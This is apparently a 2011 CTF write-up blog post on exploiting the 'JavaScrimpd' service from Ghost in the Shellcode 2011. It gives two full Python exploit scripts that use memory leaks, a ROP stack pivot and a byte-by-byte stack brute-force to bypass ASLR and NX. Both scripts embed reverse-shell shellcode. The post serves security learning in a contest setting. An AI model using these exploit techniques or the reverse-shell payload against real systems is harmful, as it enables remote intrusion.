Friday, January 14, 2011

ShmooCon CTF Warmup Contest - JavaScrimpd

Last weekend was the ShmooCon CTF Warmup Contest (aka Ghost in the Shellcode 2011). There were three challenges, the last one being an ELF binary plus the hostname of a server.

Congrats to awesie/zoaedk & tylerni7 of team PPP for solving it pretty quickly. Since they explained the level pretty well, I really invite you to read their solution.

Valuable binary information


In addition to reading the SSH banner, the binary informs us that it has been compiled under Ubuntu with gcc 4.4.3:
$ objdump -s -j .comment 6063ad0c8271898d6c5e3e83701211f6-JavaScrimpd

6063ad0c8271898d6c5e3e83701211f6-JavaScrimpd:     file format elf32-i386

Contents of section .comment:
 0000 4743433a 20285562 756e7475 20342e34  GCC: (Ubuntu 4.4
 0010 2e332d34 7562756e 74753529 20342e34  .3-4ubuntu5) 4.4
 0020 2e3300                               .3.

and that it's using libmozjs from xulrunner package 1.9.2.13:
$ readelf -d 6063ad0c8271898d6c5e3e83701211f6-JavaScrimpd
Dynamic section at offset 0x1f10 contains 23 entries:
  Tag        Type             Name/Value
 0x00000001 (NEEDED)          Shared library: [libmozjs.so]
 0x00000001 (NEEDED)          Shared library: [libc.so.6]
 0x0000000f (RPATH)           Library rpath: [/usr/lib/xulrunner-1.9.2.13/]
[...]
This information is really valuable: it lets us work with the same libmozjs.so as the server, which eases remote exploitation.
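
As a quick cross-check of the compiler string, the hex columns of the objdump output can be decoded back to ASCII. This is only a small sketch: the hex words are copied from the dump above, and the names HEX_WORDS and decode_comment are mine, not part of any tool.

```python
import binascii

# Hex columns copied from the `objdump -s -j .comment` output above.
HEX_WORDS = (
    "4743433a 20285562 756e7475 20342e34 "
    "2e332d34 7562756e 74753529 20342e34 "
    "2e3300"
)

def decode_comment(hex_words):
    """Turn objdump's hex columns back into the NUL-terminated ASCII string."""
    raw = binascii.unhexlify(hex_words.replace(" ", ""))
    return raw.rstrip(b"\x00").decode("ascii")

print(decode_comment(HEX_WORDS))  # GCC: (Ubuntu 4.4.3-4ubuntu5) 4.4.3
```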


Exploit using send() memory leak


Using the same techniques, I wrote my own exploit and challenged myself to make it work under ASLR in addition to NX. To do that, we need to:
  • automatically calculate the remote base address of libmozjs using the JS socket.send() memory leak: look for leaked values whose last 12 bits match those of pointers observed locally, subtract each pointer's known offset, and check that all candidates give the same base address
  • send a payload and get its address in the heap, again using the socket.send() memory leak to find the heap1/heap2 addresses as explained by awesie
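
The first step can be tried offline on a synthetic leak. The sketch below reuses the local reference pointers and base address from 3.py. The function name guess_base and the fake leak buffer are illustrative assumptions, and the remote base is simply the value printed in the sample run further down.

```python
from struct import pack, unpack

MASK = 0x00000FFF  # ASLR is page-granular, so the low 12 bits survive

# Pointers seen in a local leak and the local libmozjs base (from 3.py).
LOCAL_BASE = 0xb7e78000
LOCAL_PTRS = (0xb7ecc7a0, 0xb7fc7640, 0xb7ec9560)

def guess_base(mem):
    """Return the base address all reference pointers agree on, or None."""
    guesses = {}
    for i in range(0, len(mem) - 3, 4):
        value = unpack("<I", mem[i:i + 4])[0]
        for ptr in LOCAL_PTRS:
            if (value & MASK) == (ptr & MASK):
                # Same page offset: assume it is the same pointer, rebased.
                guesses[ptr] = value - (ptr - LOCAL_BASE)
        if len(guesses) == len(LOCAL_PTRS) and len(set(guesses.values())) == 1:
            return guesses[LOCAL_PTRS[0]]
    return None

# Synthetic leak: junk dwords mixed with the three pointers rebased
# onto a hypothetical remote base.
REMOTE_BASE = 0xb7673000
fake_leak = b"".join(
    pack("<I", v) for v in (
        0x41414141,
        REMOTE_BASE + (LOCAL_PTRS[0] - LOCAL_BASE),
        0,
        REMOTE_BASE + (LOCAL_PTRS[1] - LOCAL_BASE),
        REMOTE_BASE + (LOCAL_PTRS[2] - LOCAL_BASE),
    )
)
print("0x%08x" % guess_base(fake_leak))  # 0xb7673000
```

Requiring three independent pointers to agree is what keeps a random dword that happens to share the same low 12 bits from producing a wrong base.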
I tried to make the exploit code portable and verbose enough to understand. You can supply any shellcode; I used a very common shell_reverse_tcp from Metasploit.

Exploit (3.py):
#!/usr/bin/env python
# Solution for shmoocon barcode/ghost in the shellcode 2011, challenge #3
# Based on awesie/tylerni7 solution http://ppp.cylab.cmu.edu/wordpress/?p=410
# Automatically finds addresses => ASLR proof!
from sys import argv, exit
from struct import pack, unpack
from socket import *

# ./3.py [host (default localhost)] [port (default 2426)]
host = argv[1] if len(argv)>1 else "localhost"
port = int(argv[2]) if len(argv)>2 else 2426

# pivot gadget - leave (mov esp,ebp ; pop ebp) ; ret
pivot_leave = 0x8048c56

# offset of mprotect@PLT in libmozjs
mprotect_plt_offset = 0xEEF0
# ebx value to call mprotect through GOT/PLT of shared library
# obtained these values from libmozjs.so:.text:001359A2  add ebx, 1848Ah
libmozjs_ebx = 0x1359A2 + 0x1848A

# some addresses of functions found locally in the memory leak
mask = 0x00000FFF
addr1 = 0xb7ecc7a0
addr2 = 0xb7fc7640
addr3 = 0xb7ec9560
# with the following base address for libmozjs
ba = 0xb7e78000

def connect():
  s = socket(AF_INET, SOCK_STREAM)
  s.connect((host,port))
  return s

def leak_js(length=0x100, string="AAAA", timout=1):
  s = connect()
  s.settimeout(timout)
  s.send("a=new Socket();a.send('%s',%i);a.recv(0);" % (string, length))
  r = ''
  try:
    while len(r)<length:
      r += s.recv(length)
  except timeout, e:
    pass
  s.close()
  return r

def build_js(p, sendsize, recvsize):
  js  = "a=new Socket();"
  js += "s='%s';" % ("".join("\\x%02x"%ord(c) for c in p))
  js += "a.send(s,%i);" % sendsize
  js += "a.recv(%i);" % recvsize
  return (js+"//").ljust(1024,"X")

def get_heap_addr(send, leak=64):
  # 00000000  41 42 42 42 00 14 e8 b7  77 00 20 00 19 00 00 00  |ABBB....w. .....|
  # 00000010  00 00 00 00 60 e4 00 01  00 23 07 08 c8 3d 07 08  |....`....#...=..|
  #            heap1       heap2, points to buffer=ABBB
  # obtain heap1/heap2 addresses with simple buffer
  mem = leak_js(0x20, "ABBB")
  heap1 = unpack("<I", mem[-8:-4])[0]
  heap2 = unpack("<I", mem[-4:])[0]
  if mem[0:4]=="ABBB" and (heap1>>16)==(heap2>>16):
    higher_bytes = pack("<H", heap1>>16)
    # for some length, heap doesn't display heap1/heap2 addresses
    # so try to pad our payload until it displays it and we find it
    for i in range(32):
      s = connect()
      s.send(build_js("A"+"B"*(send-1), send+leak, 0))
      mem = s.recv(send+leak)
      s.close()
      # try to find heap1/heap2 by matching higher bytes found previously
      h = mem.find(higher_bytes, send)
      heap1 = unpack("<I", mem[h-2:h+2])[0]
      heap2 = unpack("<I", mem[h+2:h+6])[0]
      if (heap1>>16)==(heap2>>16):
        return heap2, i
      send += 1
  print 'unable to find heap address of buffer'
  exit(1)

def get_libmozjs_ba():
  mem = leak_js(0x5000)
  guess1, guess2, guess3 = 0,0,0
  for i in range(0,len(mem),4):
    a = unpack("<I", mem[i:i+4])[0]
    # try to match addresses we found locally and for
    # which we calculated offset to library base address
    if (a & mask)==(addr1 & mask):
      guess1 = a - (addr1 - ba)
    elif (a & mask)==(addr2 & mask):
      guess2 = a - (addr2 - ba)
    elif (a & mask)==(addr3 & mask):
      guess3 = a - (addr3 - ba)
    if guess1>0 and guess2>0 and guess3>0 and guess1==guess2==guess3:
      return guess1
  print 'unable to get libmozjs base address'
  exit(1)

def exploit(SC):
  # rop payload (in heap)
  rop  = "MPRO"
  rop += "RETN" # where to return after call
  rop += "HEAP" # const void *addr
  rop += pack("<I", 0x1000) # size_t len
  rop += pack("<I", 0x7) # int prot

  libmozjs_ba = get_libmozjs_ba()
  print "Assuming libmozjs base address at 0x%08x" % libmozjs_ba

  leak = 64
  heap, pad = get_heap_addr(len(rop+SC), leak)
  print "Assuming heap buffer at 0x%08x with %i padding" % (heap, pad)
  rop += "A"*pad

  # mprotect@plt offset
  mprotect = libmozjs_ba + mprotect_plt_offset
  # fix ebx for call
  ebx = libmozjs_ba + libmozjs_ebx

  # adjust heap and return addresses
  rop = rop.replace("MPRO", pack("<I",mprotect))
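  # mprotect() requires a page-aligned address, so round heap down
  # (len 0x1000 then covers the payload unless it straddles a page boundary)
  rop = rop.replace("HEAP", pack("<I",heap & 0xfffff000))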
  rop = rop.replace("RETN", pack("<I",heap+len(rop)))

  # stack-based buffer overflow
  p  = "A"*1052
  p += pack("<I",ebx) # ebx
  p += pack("<I",heap-4) # sebp, address of new stack
  p += pack("<I",pivot_leave) # seip, pivot (leave; ret)

  s = connect()
  s.send(build_js(rop+SC, len(rop+SC)+leak, len(p)))
  s.send(p)
  s.close()
  print "Done. Have shell?"

# Shellcode to use
# msfpayload linux/x86/shell_reverse_tcp LHOST="127.0.0.1" LPORT="1337" R |hexdump -ve '"\\\x" 1/1 "%02x"'; echo;
SC = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\x7f\x00\x00\x01\x66\x68\x05\x39\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"

exploit(SC)

It gives:
$ ./3.py
Assuming libmozjs base address at 0xb7673000
Assuming heap buffer at 0x08ccfe30 with 0 padding
Done. Have shell?
# and new connection appears in the listening netcat


Exploit not using send() memory leak: stack brute-force


Back to the recv() stack-based buffer overflow. Right after the saved instruction pointer (seip) sits the function's first argument, a pointer to the JS context, which is used (by JS_strdup() and JS_NewString()) before the function reaches ret. This is why we could not simply overwrite it as in a regular exploit, and instead had to use a leave/ret stack pivot into our buffer inside the JS code, which serves as the new stack.
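
To make the layout concrete, here is a small sketch of the overflow bytes as the two exploits imply them: 1052 bytes of padding, then ebx, sebp, seip and the context pointer. The offsets come from the "A"*1052, "A"*1056 and "A"*1060 paddings in 3.py and 3b.py. The names PAD, overflow and offsets are only illustrative.

```python
from struct import pack

PAD = 1052  # bytes before the saved ebx, per the "A"*1052 in 3.py

def overflow(ebx, sebp, seip, context):
    """Bytes that overwrite ebx, sebp, seip and the context argument."""
    return b"A" * PAD + pack("<4I", ebx, sebp, seip, context)

def offsets():
    """Offset of each overwritten slot from the start of the buffer."""
    names = ("ebx", "sebp", "seip", "context")
    return dict((name, PAD + 4 * i) for i, name in enumerate(names))

for name, off in sorted(offsets().items(), key=lambda kv: kv[1]):
    print("%-8s at offset %d" % (name, off))
```

Anything written past offset 1060 lands on the context pointer, which is why a payload longer than seip needs a valid context value in that slot.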

We could overwrite the context if we knew its value. But how do we get it without any memory leak? We can brute-force it as if it were a stack cookie (see pi3's article in Phrack #67). To distinguish good guesses from bad ones, we add a send("it works") in the JS code after the recv(). If we receive "it works", we guessed the context value correctly; a timeout means we failed. But to reach the context we also have to smash the saved base pointer (sebp) and saved instruction pointer (seip), so we need their values first. How? Same method: brute-force. All in all, we have a 12-byte, byte-by-byte brute-force.
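
The byte-by-byte idea can be simulated locally without any server. In this sketch the oracle stands in for "did the child answer after the overflow": it accepts a guess only if it is a prefix of the secret. The secret is built from the first-guess hints that appear in bf_stack() in 3b.py. make_oracle and brute_force are hypothetical names.

```python
from struct import pack

def make_oracle(secret):
    """Simulated server: a guess survives only if it is a prefix of secret."""
    calls = [0]
    def oracle(prefix):
        calls[0] += 1
        return secret.startswith(prefix)
    return oracle, calls

def brute_force(oracle, length):
    """Recover `length` bytes one at a time, lowest address first."""
    known = b""
    while len(known) < length:
        for value in range(256):
            candidate = known + pack("B", value)
            if oracle(candidate):
                known = candidate
                break
        else:
            raise RuntimeError("no byte matched at offset %d" % len(known))
    return known

# sebp, seip, context: example values taken from the hints in bf_stack()
secret = pack("<3I", 0xbfffeb68, 0xb7ee47a7, 0x080556d0)
oracle, calls = make_oracle(secret)
recovered = brute_force(oracle, len(secret))
print("recovered %d bytes in %d tries" % (len(recovered), calls[0]))
```

Because each byte is confirmed before moving on to the next, the cost grows linearly with the number of bytes instead of exponentially.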

Note: the stack brute-force works here because the server uses recv() (no extra character is appended, unlike with fgets()) and because it only fork()s and does not execve() itself again (in which case ASLR would change all addresses). Locally it takes about 2 minutes to brute-force the 12 bytes (min 12 tries, max 256*12=3072 tries).

What next? After using a pop+ret gadget to skip the context and the other unusable stack variables, we have a regular stack-based buffer overflow. We can then return to send@PLT to send ourselves any memory area! The only problem is providing the correct file descriptor, the one of our socket. We can get it by calling JS send(socket.fileno) before recv(), and then build our buffer overflow payload with that value.
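
A call made from a 32-bit ROP chain follows a fixed pattern: function address, a cleanup gadget that pops the arguments, then the arguments themselves. The helper below is a sketch of that pattern using the PLT and gadget addresses listed in 3b.py. rop_call and leak_chain are names I made up, and I am assuming the ";;" in the gadget comments stands for ret.

```python
from struct import pack

def rop_call(func, cleanup, *args):
    """One cdecl call in a 32-bit ROP chain.

    Layout: [func][cleanup gadget][arg0][arg1]...
    `cleanup` must pop exactly len(args) dwords before its ret, so that
    execution continues with whatever follows this frame.
    """
    frame = pack("<I", func) + pack("<I", cleanup)
    frame += b"".join(pack("<I", a & 0xffffffff) for a in args)
    return frame

SEND_PLT = 0x08048E98  # from 3b.py
POP_4    = 0x8049815   # pop ebx ; pop esi ; pop edi ; pop ebp ; ret (assumed)
EXIT_PLT = 0x08048F58

def leak_chain(fd, start, length):
    """send(fd, start, length, 0), then exit() so the child ends cleanly."""
    return rop_call(SEND_PLT, POP_4, fd, start, length, 0) + pack("<I", EXIT_PLT)

chain = leak_chain(4, 0x0804AFF4, 0xD4)
print("%d-byte chain" % len(chain))
```

The file descriptor 4 here is only a placeholder; in the real exploit it is the value returned by the JS send(socket.fileno) call.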

So now we have an arbitrary memory leak. Rather than falling back on the first solution using libmozjs, let's choose another approach. Since the binary is not position independent, we know where it is mapped in memory, and in particular where its GOT (Global Offset Table) is. There, we can find function pointers that are already resolved (because the functions have already been called) and point directly into the libc: signal(), recv(), listen(), setuid(), etc. Assuming we have the same libc (we guessed the Ubuntu version), we can then deduce the remote libc base address.
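
The deduction can be checked offline on a fabricated GOT dump. The slot addresses and local libc values below are the ones from 3b.py. The remote base, the fake_got helper and the extra page-alignment check are my own assumptions for the sake of the example.

```python
from struct import pack, unpack

GOT_START, GOT_END = 0x0804AFF4, 0x0804B0C8
SLOTS = {"signal": 0x0804B00C, "recv": 0x0804B014, "listen": 0x0804B01C}
LOCAL = {"signal": 0xb7d48530, "recv": 0xb7deccb0, "listen": 0xb7decc70}
LOCAL_BASE = 0xb7d1e000

def libc_base(got_dump):
    """Return the libc base if every resolved slot agrees on it, else None."""
    bases = set()
    for name, slot in SLOTS.items():
        off = slot - GOT_START
        resolved = unpack("<I", got_dump[off:off + 4])[0]
        bases.add(resolved - (LOCAL[name] - LOCAL_BASE))
    if len(bases) == 1:
        base = bases.pop()
        if base & 0xfff == 0:  # a library is mapped on a page boundary
            return base
    return None

def fake_got(base):
    """Fabricated dump: zeros everywhere except the three resolved slots."""
    dump = bytearray(GOT_END - GOT_START)
    for name, slot in SLOTS.items():
        off = slot - GOT_START
        dump[off:off + 4] = pack("<I", base + LOCAL[name] - LOCAL_BASE)
    return bytes(dump)

print("0x%08x" % libc_base(fake_got(0xb7595000)))  # 0xb7595000
```

If the remote libc differs from the local one, the three candidates disagree and the function returns None, which is the signal to dump the library instead.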

What if it is not the same libc but an obscure, different one? We can guess its base address and dump it remotely using our arbitrary memory leak. Once we have the whole library, we can analyze it and find what we need.
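
One possible way to do this, sketched under assumptions: start from any pointer known to land inside the library (for example a resolved GOT entry), walk down page by page until a page begins with the ELF magic, then dump upward in chunks. Here leak(start, length) is a stand-in for something like leak_mem() in 3b.py and is simulated with a fake memory image. I have not run this against the real target.

```python
PAGE = 0x1000
ELF_MAGIC = b"\x7fELF"

def find_elf_base(leak, addr, max_pages=0x400):
    """Walk down from addr, one page at a time, until the ELF header shows up."""
    page = addr & ~(PAGE - 1)
    for _ in range(max_pages):
        if leak(page, 4) == ELF_MAGIC:
            return page
        page -= PAGE
    return None

def dump(leak, start, size, chunk=PAGE):
    """Read `size` bytes starting at `start`, one chunk per leak call."""
    data = b""
    while len(data) < size:
        part = leak(start + len(data), min(chunk, size - len(data)))
        if not part:
            break  # nothing came back: stop rather than loop forever
        data += part
    return data

def make_fake_leak(base, image):
    """Simulated remote memory holding `image` mapped at `base`."""
    def leak(start, length):
        off = start - base
        if off < 0 or off >= len(image):
            return b""
        return image[off:off + length]
    return leak

image = ELF_MAGIC + b"\x00" * (3 * PAGE)
leak = make_fake_leak(0xb7595000, image)
base = find_elf_base(leak, 0xb7595000 + 0x2a530)
print("0x%08x" % base)  # 0xb7595000
```

Each real leak costs one connection and one overflow, so a larger chunk size keeps the number of round trips down.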

Now that we have access to any libc function, many solutions are possible. I chose to mmap() an rwx area, download a shellcode over the socket into it using recv() (with the same socket fileno leak explained above) and return to it.
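
For reference, this is how the six mmap() arguments end up on the stack. The constants are the Linux i386 values and are defined locally so the sketch does not depend on the host platform. mmap_args is an illustrative name.

```python
from struct import pack

# Linux i386 values from <sys/mman.h>, spelled out on purpose.
PROT_READ, PROT_WRITE, PROT_EXEC = 0x1, 0x2, 0x4
MAP_PRIVATE, MAP_ANONYMOUS = 0x02, 0x20

def mmap_args(addr, size):
    """Pack mmap(addr, size, rwx, private|anonymous, -1, 0) as six dwords."""
    prot = PROT_READ | PROT_WRITE | PROT_EXEC  # 0x7
    flags = MAP_PRIVATE | MAP_ANONYMOUS        # 0x22
    fd = -1 & 0xffffffff                       # -1 as an unsigned dword
    return pack("<6I", addr, size, prot, flags, fd, 0)

args = mmap_args(0x13370000, 0x10000)
print(" ".join("%02x" % b for b in bytearray(args[8:16])))  # prot, flags
```

Without MAP_FIXED the address is only a hint to the kernel, so the chain relies on the requested range being free in the target process.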

Again, I tried to make the exploit code portable and verbose enough to understand, and again you can supply any shellcode; I used the same connect-back as before.

Exploit (3b.py):
#!/usr/bin/env python
# Solution for shmoocon barcode/ghost in the shellcode 2011, challenge #3
# It does not use JS send() memory leak but brute-forces the stack (like an
# SSP brute-force), so it becomes a regular stack-based buffer overflow.
# We use send() to leak remote process memory and use this to find remote libc
# base address by looking at resolved libc functions in binary's .got section.
# Finally mmap() ourselves an rwx area, recv() a shellcode and return to it.
from sys import argv, exit
from struct import pack, unpack
from time import sleep
from socket import *

# ./3b.py [host (default localhost)] [port (default 2426)]
host = argv[1] if len(argv)>1 else "localhost"
port = int(argv[2]) if len(argv)>2 else 2426

pop_11 = 0x8049812 # add esp 0x1c (28) ; pop ebx ; pop esi ; pop edi ; pop ebp ;;
pop_4 = 0x8049815 # pop ebx ; pop esi ; pop edi ; pop ebp ;;
send_plt = 0x08048E98
recv_plt = 0x08048CB8
exit_plt = 0x08048F58

got_plt_start, got_plt_end = 0x0804AFF4, 0x0804B0C8
# Some libc functions already resolved by GOT/PLT
# by the time we smash the stack
signal_got = 0x0804B00C
recv_got   = 0x0804B014
listen_got = 0x0804B01C

# Functions in my libc and its base address during a local run
my_signal = 0xb7d48530
my_recv   = 0xb7deccb0
my_listen = 0xb7decc70
my_mmap   = 0xb7de7ee0
my_libc_ba = 0xb7d1e000

def connect():
  s = socket(AF_INET, SOCK_STREAM)
  s.connect((host,port))
  return s

def alive():
  s = connect()
  s.send("a=new Socket();a.send('ping\\n');")
  r = s.recv(5)
  s.close()
  return r=='ping\n'

def leak_js(length=0x100, string="AAAA", timout=1):
  s = connect()
  s.settimeout(timout)
  s.send("a=new Socket();a.send('%s',%i);a.recv(0);" % (string, length))
  r = ''
  try:
    while len(r)<length:
      r += s.recv(length)
  except timeout, e:
    pass
  s.close()
  return r

def try_byte(current, byte, timout=0.3):
  s = connect()
  s.settimeout(timout)
  p = "A"*(1056) + current + byte
  found = False
  try:
    s.send(("a=new Socket();a.recv("+str(len(p))+");a.send('HAI\\n')//").ljust(1024,"X"))
    s.send(p)
    found = s.recv(4)=="HAI\n"
  except timeout, e:
    pass
  s.close()
  return found

def find_byte(current, first_check=[]):
  timout = 0.2 if host=="localhost" else 0.6
  found = False
  while not found:
    for i in first_check+list(set(range(256))-set(first_check)):
      if try_byte(current, chr(i), timout):
        found = True
        print " * found byte 0x%02x" % i
        return chr(i)
    if not found:
      timout *= 2
      if alive():
        print "Not found, retrying with timeout %.1f" % timout
      else:
        print "Target dead?"
        exit(1)

def bf_stack():
  print "Brute-forcing the stack to get sebp, seip & context addresses"
  sebp = ''
  sebp += find_byte(sebp,[0x68])
  sebp += find_byte(sebp,[0xeb])
  sebp += find_byte(sebp,[0xff])
  sebp += find_byte(sebp,[0xbf])
  seip = ''
  seip += find_byte(sebp+seip,[0xa7])
  seip += find_byte(sebp+seip,[0x47])
  seip += find_byte(sebp+seip,[0xee])
  seip += find_byte(sebp+seip,[0xb7])
  context = ''
  context += find_byte(sebp+seip+context,[0xd0])
  context += find_byte(sebp+seip+context,[0x56])
  context += find_byte(sebp+seip+context,[0x05])
  context += find_byte(sebp+seip+context,[0x08])
  sebp, seip, context = unpack("<I",sebp)[0], unpack("<I",seip)[0], unpack("<I",context)[0]
  print "Found: sebp, seip, context = 0x%08x, 0x%08x, 0x%08x" % (sebp, seip, context)
  return (sebp, seip, context)

def prepare_payload_rop():
  p = "A"*1060
  p += pack("<I", pop_11) # seip
  p += pack("<I", context) # do not smash context
  p += pack("<I", 0)*3 # unused
  p += pack("<I", context-4) # something writeable
  p += pack("<I", 0)*(11-5) # unused
  return p # after that goes the rop payload

def leak_mem(start,length):
  p  = prepare_payload_rop()
  p += pack("<I", send_plt)
  p += pack("<I", pop_4)
  p += "FDNO" # int fd
  p += pack("<I", start) # void *buf
  p += pack("<I", length) # size_t n
  p += pack("<I", 0) # int flags
  p += pack("<I", exit_plt)

  s = connect()
  s.send(("a=new Socket();a.send(a.fileno);a.recv("+str(len(p))+");//").ljust(1024,"X"))
  fileno = unpack("<I", s.recv(4))[0]
  p = p.replace("FDNO", pack("<I",fileno))
  s.send(p)
  r = ''
  try:
    while len(r)<length:
      r += s.recv(length)
  except timeout, e:
    pass
  s.close()
  return r

def get_libc_ba():
  mem = leak_mem(got_plt_start, got_plt_end-got_plt_start)

  signal = unpack("<I", mem[signal_got-got_plt_start:signal_got-got_plt_start+4])[0]
  recv   = unpack("<I", mem[recv_got-got_plt_start:recv_got-got_plt_start+4])[0]
  listen = unpack("<I", mem[listen_got-got_plt_start:listen_got-got_plt_start+4])[0]

  guess1 = signal - (my_signal - my_libc_ba)
  guess2 = recv   - (my_recv   - my_libc_ba)
  guess3 = listen - (my_listen - my_libc_ba)
  if guess1==guess2==guess3:
    return guess1
  print "Could not find remote libc base address - maybe different version?"
  print "You can try to leak it progressively using leak_mem(), then explore it to find the offsets you need"
  exit(1)

def exploit(SC, area=0x13370000, size=0x10000):
  p  = prepare_payload_rop()

  # mmap an rwx area at 0x13370000
  p += pack("<I", libc + (my_mmap - my_libc_ba))
  p += pack("<I", pop_11)
  p += pack("<I", area) # void *addr
  p += pack("<I", size) # size_t length
  p += pack("<I", 0x7) # int prot - PROT_READ(0x1) | PROT_WRITE(0x2) | PROT_EXEC(0x4)
  p += pack("<I", 0x22) # int flags - MAP_ANONYMOUS(0x20) | MAP_PRIVATE(0x02)
  p += pack("<I", 0xffffffff) # int fd - MAP_ANONYMOUS => -1
  p += pack("<I", 0) # off_t offset
  p += pack("<I", 0)*(11-6) # unused

  # receive a shellcode in it
  p += pack("<I", recv_plt)
  p += pack("<I", pop_4)
  p += "FDNO" # int fd
  p += pack("<I", area) # void *buf
  p += pack("<I", len(SC)) # size_t n
  p += pack("<I", 0) # int flags

  # jump to it
  p += pack("<I", area)

  s = connect()
  s.send(("a=new Socket();a.send(a.fileno);a.recv("+str(len(p))+");//").ljust(1024,"X"))
  fileno = unpack("<I", s.recv(4))[0]
  p = p.replace("FDNO", pack("<I",fileno))
  s.send(p)
  s.send(SC)
  s.close()
  print "Done. Have shell?"

# Shellcode to use
# msfpayload linux/x86/shell_reverse_tcp LHOST="127.0.0.1" LPORT="1337" R |hexdump -ve '"\\\x" 1/1 "%02x"'; echo;
SC = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\x7f\x00\x00\x01\x66\x68\x05\x39\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"

sebp, seip, context = bf_stack()
libc = get_libc_ba()
print "Remote libc at 0x%08x" % libc
exploit(SC)
This exploit also bypasses ASLR, but takes more time because of the brute-force. Still, I like it because, thanks to the arbitrary memory leak using send(), we don't have to make any assumption about the remote libraries. If they are unknown, we can find where they are from the GOT, then dump and analyze them.


Thank you ShmooCon and Ghost in the Shellcode for this cool challenge!

2 comments:

  1. Nice post! The objdump trick is cool.

    In 3.py, mprotect() will fail if *addr is not multiple of page_size, suggest to use (heap & 0xfffff000) instead of heap in rop stuff

  2. nice alternative way! byte-per-byte brute-force is not bad at all :)
